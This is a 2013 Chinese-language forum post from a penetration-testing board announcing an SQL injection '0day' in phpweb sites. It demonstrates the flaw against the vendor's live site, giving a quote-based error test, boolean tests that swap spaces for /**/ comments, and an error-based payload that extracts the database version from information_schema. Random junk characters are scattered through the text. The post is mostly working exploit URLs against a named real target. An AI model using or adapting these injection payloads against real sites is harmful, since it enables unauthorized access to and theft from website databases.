找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpweb伪静态页面注入0day
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2315|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入6 S0 t1 b, _: K4 z
: X1 f+ g8 a8 q: ?6 F
主站:http://phpweb.net/- N- {* {5 ^& n( o& P& F2 X$ C
加’检测:& I$ R. i5 |' P1 e

" C2 H' m+ }" ~$ D) |http://www.phpweb.net/down/html/?772′.html
' i' K2 s/ L# Y- G ! i4 R) j! {  D1 w: d4 ]# g
出错
5 b' V# ]" r; f( m+ \存在注入。
/ e% {3 }4 c1 `  @, q9 d不能用空格,只能用/*罗9 ?* a: S- u$ @  W0 p
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
8 \1 u- _( f% W8 N
) [2 \/ \8 B" M7 L3 Q5 F( ?http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
" T0 H: p& K+ ?  D9 H( n6 b6 \5 l爆数据库版本:
. b! y4 u# x: \ 0 a2 \% C2 o3 j" k4 |1 J$ F
?- w3 T: U+ M" ]6 U, |# w
1
  F$ H: A+ x( S# ~8 S: mhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
5 m# M* U: z& T" s2 ~更新日期: 2013-01-03 13:39:50        7 z6 _5 V% ~- C
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表